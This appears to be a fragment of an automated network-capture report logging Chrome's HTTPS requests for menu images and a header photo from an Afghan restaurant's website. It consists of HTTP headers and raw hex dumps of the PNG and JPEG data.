                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC6669INData Raw: e8 ef 78 e4 d1 3f 31 a9 7b 80 7d bb bb d8 b4 62 1b a6 05 6f 6d ec e3 a8 2d eb b9 ef b7 3f e3 a1 f3 2e e3 f0 40 29 57 b6 f8 21 23 a1 7d a8 9b 24 92 e6 f2 11 12 91 1a dc 7c 8e 82 02 a7 98 1f db d5 28 3d 65 c5 62 91 a8 65 46 ea 1b eb 0c 9f e5 77 3f 03 b7 2c 51 81 69 99 34 4e 9c 3e 3e 9a a8 64 34 93 03 45 69 b4 a3 97 4a 0b d3 0a 12 8f 27 88 04 c1 5f 56 c3 87 ef bf cb 7b 87 52 4c 29 17 5c f3 d5 7f 61 d7 ec 63 79 f2 ed 55 00 04 8a 10 b7 a0 79 d6 24 8e 9c 30 83 9e d6 56 ce fa ca bf 30 63 f1 91 3c ff 83 1f f0 d4 9b 5b 38 08 d4 25 8e e2 a2 6b bf c6 d1 17 5c c3 50 eb 06 0e ed db c7 86 d7 de 83 3d 7d 6c 7f 6b 3d 2a db c7 bc d3 8e 27 60 1d 4b 68 42 3b 97 dc 78 0d cf fe e8 0e 32 eb fe cc d9 8b 9a d8 78 68 27 a1 ba 7a cc 7d 2e 9d 87 fb 78 7f f5 2e f6 75 8f 12 04 ae 38
                                                                                                                                                    Data Ascii: x?1{}bom-?.@)W!#}$|(=ebeFw?,Qi4N>>d4EiJ'_V{RL)\acyUy$0V0c<[8%k\P=}lk=*'`KhB;x2xh'z}.x.u8


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    83192.168.2.449850162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC396OUTGET /assets/imgs/menu_imges/Chicken_Korma.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:27:54 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 43957
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 4b 08 06 00 00 00 57 d3 e4 82 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKWpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC6042INData Raw: b8 14 33 b5 3a a4 51 f7 99 53 2e 1b 03 cd 4e 6d 11 bb bb cc 6c b1 cd c1 ba 62 67 58 10 8e 37 39 f7 60 85 d5 33 bf ce 52 bf c6 b8 b6 8f e8 e6 b3 cc 3d 78 88 17 97 37 50 3b 5d 6a 3e 74 d9 23 74 15 46 0a 32 ab f0 a5 22 b3 1e eb 43 a8 15 39 53 0d 70 9a b3 e8 bc b8 5d 35 15 13 33 70 8b 82 6e 8c 29 b5 11 93 14 d5 6c 1c f0 7c e7 10 f0 e2 57 81 40 e0 32 77 e0 d8 a3 3e a5 dc 9b d5 02 6d 33 86 57 3f 87 1d a7 8c 23 49 a6 05 55 c7 a5 9f 16 54 02 45 58 f5 19 8f 24 7a 1c 13 b8 3e 1a 4d 14 c7 14 ba 54 18 31 c2 e2 7a 1e e3 54 93 17 05 95 d0 c3 c5 e0 98 32 ae cd 73 83 4f f1 40 b4 79 09 13 86 77 72 df 42 e0 28 59 02 40 aa 5b 52 c2 04 9e c2 f3 1c 0a 7d 97 4f 90 bb 28 25 5d f3 35 46 f9 dc b2 04 4e b5 86 37 b3 c0 20 bb 88 53 68 96 80 2d 6d 38 b3 35 44 c5 29 87 f7 cd b3 9b e4
                                                                                                                                                    Data Ascii: 3:QS.NmlbgX79`3R=x7P;]j>t#tF2"C9Sp]53pn)l|W@2w>m3W?#IUTEX$z>MT1zT2sO@ywrB(Y@[R}O(%]5FN7 Sh-m85D)


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    84192.168.2.449851162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC398OUTGET /assets/imgs/menu_imges/Meat_Ball_Curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:44:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37135
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 4b 08 06 00 00 00 f0 22 90 3c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRZK"<pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:49 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:49 UTC15604INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    85192.168.2.449852162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:49 UTC380OUTGET /assets/imgs/header_5.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:49 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:49 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 390429
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:49 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: ff d8 ff e1 1d bd 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0d 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 aa 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 b0 01 1b 00 05 00 00 00 01 00 00 00 b8 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 c0 01 32 00 02 00 00 00 14 00 00 00 e2 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 f8 00 00 01 54 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 32 32 3a 31 33 3a
                                                                                                                                                    Data Ascii: ExifMM*@,(1"2iT-'-'Adobe Photoshop CC 2015 (Windows)2022:07:26 22:13:
                                                                                                                                                    2024-10-01 04:26:49 UTC6016INData Raw: 8f cc e5 69 99 fb 6e 57 8e f6 cc c6 ff 00 a3 5f f6 36 fe e6 df f0 4b e7 c4 96 7c bf 9a 87 f7 a5 fd df 95 b5 fa 72 fe ec 7f e9 3f 45 69 bb dd 1e 53 3b bf eb 9b 16 3f 48 f5 3d 4b fd 4f a5 fb 4c 7f 4c d9 eb 4e c6 6e f5 fd 1f 67 da bf f2 ab fe eb 7d 9f d1 ff 00 06 bc 35 25 1f 6f a7 f7 be ab ba 4b f9 47 fc 17 e8 6d 3d 77 c7 80 fa 13 ba 77 3b fd 58 8b 6f fc 95 9b 3e 9e df 46 c9 fb 57 f4 6f a3 ee fb 46 df 7f a1 fe 93 67 fd 6f f3 17 ce 89 27 f2 df cf 47 7e bf 2e db 7f d1 46 6f 93 ec df e6 ff 00 d1 9f 66 fa 91 b7 ed b6 ff 00 35 bf d1 31 33 f6 88 86 ff 00 35 fe 0b f7 3e d1 bb f4 bf f8 32 b7 f5 8e 3e d1 4c 7d 3f b3 ba 26 7d 38 dd f9 fb ff 00 43 e9 ff 00 a5 5e 1c 92 39 ff 00 dc bd 3e 7e 9f de fd 1f e5 fc d3 2e 0f f7 5f 5f 97 f4 bf ba fa c5 f3 fa cc 7a 7b fd 0a be 9c
                                                                                                                                                    Data Ascii: inW_6K|r?EiS;?H=KOLLNng}5%oKGm=ww;Xo>FWoFgo'G~.Fof5135>2>L}?&}8C^9>~.__z{
                                                                                                                                                    2024-10-01 04:26:49 UTC2176INData Raw: 23 9b c5 7f b5 4f 3b 53 59 90 1b 29 34 e9 04 8f 21 b4 81 1d 13 89 b7 65 34 b7 71 1e 4b 08 c8 e0 47 33 4f 06 e6 77 52 24 39 21 25 8f 4b 72 b8 b9 ed 07 ca e9 f7 6b b8 fe 59 75 d1 ea 1c 71 b5 6e 4c 06 e9 8e bc 0f 2f 7e 31 e1 99 3f 98 bf be 5f d7 ae 2c 58 32 92 8b 74 1c cd 45 14 cf 14 f1 e7 e0 c8 61 cb 81 83 44 df 06 1e 5f b8 fe 16 a7 63 72 a6 ba 4c d9 31 f3 1f 11 3e ae bd 35 96 e2 b3 dd 17 d5 d1 75 86 dc 33 34 88 f2 a3 3a 32 62 06 fa 1f e5 fe 54 9e 28 eb 49 6a d7 31 55 18 27 37 16 fc 47 3a 1c 46 93 c6 b4 52 46 1b 9d 08 cb c6 2b 72 b4 15 d6 10 3d 24 71 bf 65 59 50 b2 a1 89 c5 d0 d0 f4 6b 1b 55 a8 de c6 a9 40 23 83 ec 61 9b 07 cb bc c5 6f 98 8d 81 39 d1 fb 12 38 0a 08 b1 8c b3 a5 45 b4 71 2c 2b a2 ef 58 5f 52 a2 65 17 e1 c4 56 13 2b 1c 60 4a ec 09 51 20 e4 2b
                                                                                                                                                    Data Ascii: #O;SY)4!e4qKG3OwR$9!%KrkYuqnL/~1?_,X2tEaD_crL1>5u34:2bT(Ij1U'7G:FRF+r=$qeYPkU@#ao98Eq,+X_ReV+`JQ +
                                                                                                                                                    2024-10-01 04:26:49 UTC16384INData Raw: d3 f1 a9 c4 76 14 c2 a6 85 84 20 44 ac c7 b6 a4 4a 59 52 f4 e8 57 4f 3a a0 b2 13 62 58 51 c2 91 94 37 11 c0 d3 d7 8d 21 5b 53 46 82 2a 57 20 8a 85 c0 26 fd b5 6d d4 37 e9 aa ae 08 e1 6e 74 a7 1d 63 10 eb 28 8c af a6 94 a3 78 1b 81 bd 23 20 0c d1 de c7 b2 aa ee 31 bd 82 a9 bc 9a ac 6f 4d da d3 27 a8 26 3b 76 31 b1 86 c2 7c 8b 70 08 7c 89 fc ef 4d 29 41 63 c4 6e 66 a2 02 af 33 b0 de 10 d9 b6 e3 be 4c 61 37 fa 58 1b f1 1b d4 47 ee d4 ff 00 b5 5b d0 8b 18 08 82 c8 a2 c1 47 65 41 85 85 16 df 02 e2 e3 8d 31 20 b2 8f 8f cc df 33 54 f5 d2 c7 88 63 1a 6f d6 73 32 64 2e df 09 ea f5 7a 98 cd 4c 8b 88 ed 61 55 d9 af 4e 67 bd 44 4d 49 51 0d 28 a4 e7 4e 1c 2a 4b 12 7c 71 63 aa ac b5 f9 0e 42 ab c5 c2 df 37 2a 98 82 6d ab b2 84 1b 96 74 8b 60 47 1e 42 b9 5f e6 4e 0e 16
                                                                                                                                                    Data Ascii: v DJYRWO:bXQ7![SF*W &m7ntc(x# 1oM'&;v1|p|M)Acnf3La7XG[GeA1 3Tcos2d.zLaUNgDMIQ(N*K|qcB7*mt`GB_N
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 29 f6 d2 68 85 8a 3f cd 5a 0d a7 ab c6 1a ae 3e eb 32 e4 63 f8 17 2e 3f 29 f2 8c 9f 4e aa e9 e0 fe e1 8b 31 14 08 bf 9b e5 9c b7 ed 59 45 ad 91 36 60 7f aa 92 90 5a 45 59 51 83 c4 45 d5 94 f0 34 b5 bb ef 04 4c d3 d7 af 5e 92 96 a4 91 d7 a5 a6 5e 96 f5 24 8e a4 a4 bd 3a f5 24 89 49 4e b5 25 aa 49 3d 49 cb 8f 6d 2d 25 58 95 2a ee 9b 5e 1e f5 0f d3 ee 31 2c f1 fc c3 bc bf 6c 6f e2 5a e6 7b e7 e5 7e 4e df 09 fe 8e ed 97 8c 0e a1 0c 9f b5 5f ba ff 00 bc 5a ea b4 a1 8a 9b 83 6f b7 b6 83 26 25 c8 29 a3 31 e5 7c 66 d4 fd dd 27 03 8c 2c 77 83 36 36 75 e4 63 3c 19 4d 5a 69 0a 2e 85 71 2e 38 1c ad 72 9f 63 57 60 de 7a 7f 6f ea 04 b6 6c 76 90 78 65 4e 0e 3f b6 b9 9e f3 d1 1b a6 c2 59 e2 ff 00 9a c5 06 fe e4 63 be 07 ff 00 7c c5 fe 6a e7 3f 68 71 82 31 d9 bf aa 74 57
                                                                                                                                                    Data Ascii: )h?Z>2c.?)N1YE6`ZEYQE4L^^$:$IN%I=Im-%X*^1,loZ{~N_Zo&%)1|f',w66uc<MZi.q.8rcW`zolvxeN?Yc|j?hq1tW
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 78 04 ac ec a9 87 8f 8b f5 58 f1 99 b4 4c 7d a2 dc 2d 6f b3 cc b4 47 74 cf 8d 25 4d 97 6b 66 91 05 8b c8 7c 00 0f dd 2d 00 97 29 e5 9b da 75 2f 20 24 28 1c a9 59 b2 62 c2 8a a0 72 23 4f da f9 a6 de df 16 6c ce ce 5b 8a 39 2c d7 f4 fc bf bb 2c e5 67 e6 ee 11 24 79 2e 51 15 b5 68 07 e3 45 fa 7b a5 65 dc 08 c8 ca 26 38 2f c3 e2 df a6 af f4 e7 48 9d 43 37 72 24 b9 f0 c6 79 5a b6 c8 02 0b 01 61 f0 15 78 7b 5c b9 9b dc cd e8 1e 85 fb 7d 51 1d d7 7c 98 14 e1 ed b7 ea e3 fd 32 38 21 4c 58 84 30 a8 54 5e c1 53 2a 6a e3 c8 52 7b 77 e2 7c 35 06 56 5a 44 8c ec c1 63 40 59 d8 9b 2a 81 e7 76 ae b0 00 0a 5d bc 27 14 92 4d b6 ac 77 32 59 67 b7 71 39 da b8 8f e6 3f e6 ff 00 d3 17 da 3a 72 40 67 20 ac d9 60 f0 4f e5 62 fa a4 f5 4b e4 f2 7c a1 3f 32 3f 36 e4 de 75 ed 3b 03
                                                                                                                                                    Data Ascii: xXL}-oGt%Mkf|-)u/ $(Ybr#Ol[9,,g$y.QhE{e&8/HC7r$yZax{\}Q|28!LX0T^S*jR{w|5VZDc@Y*v]'Mw2Ygq9?:r@g `ObK|?2?6u;
                                                                                                                                                    2024-10-01 04:26:50 UTC16331INData Raw: a9 a3 25 1d 07 ee da a5 e8 ee 9b dc 37 3d fb 17 da c7 93 e8 f1 e5 f7 27 9d c7 e0 c9 a7 c2 d8 eb f3 f9 6b bf cd 00 c9 85 46 6c 71 bb 5f 80 70 08 07 e3 de a6 47 9b 1c 8a 50 30 40 87 4e 94 f8 8f d1 e5 a1 f6 80 8e 3d de 42 1b f1 41 5d 79 ef 3f 4e ee 83 10 16 94 e3 48 02 8e 76 d2 75 69 fd 5a f9 83 6f 9d 61 c6 4c 66 98 85 74 04 69 f8 fa 74 d7 d6 e9 dd e2 38 13 d8 78 ff 00 7a b3 58 bd 29 d3 b8 39 cf 9d 8d 81 0f d4 96 b9 6b 5c 03 f1 44 f0 a5 5b e3 f7 f4 5d 40 eb 17 db e6 18 49 62 2e 72 7c 0d 9f a9 32 1f 54 30 cf ee 08 d4 c2 ce 7f 0d cf f3 af f2 57 78 c5 56 4c 34 c5 92 c2 61 0e 86 b7 84 39 1d e1 fd ea 41 96 d0 bf e3 ca 14 b1 ba a7 01 fe 8a 97 ea 12 72 51 53 bb ce e3 e3 55 8b 12 e1 b1 76 60 e5 cc 72 d7 4a 9f 3a 3e 0e db b5 45 8f b4 ee d8 39 18 b9 27 21 c6 5c 84 11
                                                                                                                                                    Data Ascii: %7='kFlq_pGP0@N=BA]y?NHvuiZoaLftit8xzX)9k\D[]@Ib.r|2T0WxVL4a9ArQSUv`rJ:>E9'!\
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 90 aa a4 37 87 1e 43 c8 9f 37 0f bd dd ad 8f ab 00 3d 3d 47 cb 32 28 dd ba c8 7a ab 76 c5 c4 53 b6 a2 bb 0c 55 52 c4 70 57 6f 30 fb f5 90 dd f6 c9 5a 78 f3 0c 0d 04 53 ae a8 95 8f 78 7d fa 8f 75 dc 1a 2c 74 67 56 c8 99 d8 99 40 f2 83 fb ca 4c 6c 6d c3 2f 04 be 73 bc 97 37 c6 62 6e da 47 cb 5c dc d9 11 cd 8d a6 dc 23 86 92 ce 26 6c 3b 76 dd 2c 53 c6 4a 6a 06 48 54 5d 9c 9f 0b d0 ec 47 c7 66 68 8b 3c 50 ca fd c8 e4 e2 54 fd 9e 9a b9 07 d4 2c 1f 5b 86 49 95 78 36 a1 76 0a 3c 4d a6 ab 64 4f cf 27 27 4b b4 d6 37 ed 06 92 f5 c5 6a 3c 71 66 3c 8c 7e 46 7e 5e 14 c9 97 03 6a 92 36 f6 41 3c ca d1 1d bd 84 d9 46 1c 93 ed c5 3f 72 47 6e 40 fc be 9a a5 8a ef 06 5c 6c b8 d2 64 22 ae b2 18 58 de ae 4d b8 cb bd b4 df 47 8c 0b c8 3b ca 7b 3f 47 cf 57 c1 4e e7 68 0c c2 e9
                                                                                                                                                    Data Ascii: 7C7==G2(zvSURpWo0ZxSx}u,tgV@Llm/s7bnG\#&l;v,SJjHT]Gfh<PT,[Ix6v<MdO''K7j<qf<~F~^j6A<F?rGn@\ld"XMG;{?GWNh
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: b4 ee 99 08 44 fe 28 a2 3d a7 d2 f5 ce 3c b2 e4 6c 87 56 3e 5f da 9a 71 e3 c7 8d 0e bb ed 2c 63 a6 1f 52 6f 53 ee 31 9f 7b fa 62 ac 71 af 2d 52 9f 37 ea d6 4f a8 b3 b7 09 73 96 0c 6c 69 5d 92 fe e6 95 25 55 db c4 75 56 df 17 a8 b1 72 b1 71 32 31 b1 e1 89 72 0f e2 bc 3c 95 fd 33 b7 ae 8c 60 e6 4f 88 ae 88 e1 62 0c 4b 02 3c 60 f8 b5 d6 c2 57 0e 40 ae 09 55 4e 9f 5b 44 8c ae a0 95 d0 fc 60 0d c2 53 d3 bb 4c 1b 70 47 0d 9a 01 6c 8e 68 3b 4c 61 ea 0d f7 39 60 8f 11 23 e3 12 9f 07 c4 d6 e7 1f 0b 07 76 db 4e d6 e2 d8 73 a9 31 9e d8 cf 95 93 ee b5 73 7d fb 68 c9 e9 c6 c3 c2 dc e5 56 79 1d b4 b0 1e 25 07 c8 df c5 d3 e4 a6 e6 ec 88 f6 d8 6a 18 40 c3 dc ab 02 8f a3 dd c6 2e fe b8 fe eb cd 0e a5 bf 32 79 81 fb b4 f9 ab 52 9d 61 bb f4 fe 26 2e e5 9f 0b 1c 39 5d 7d c8
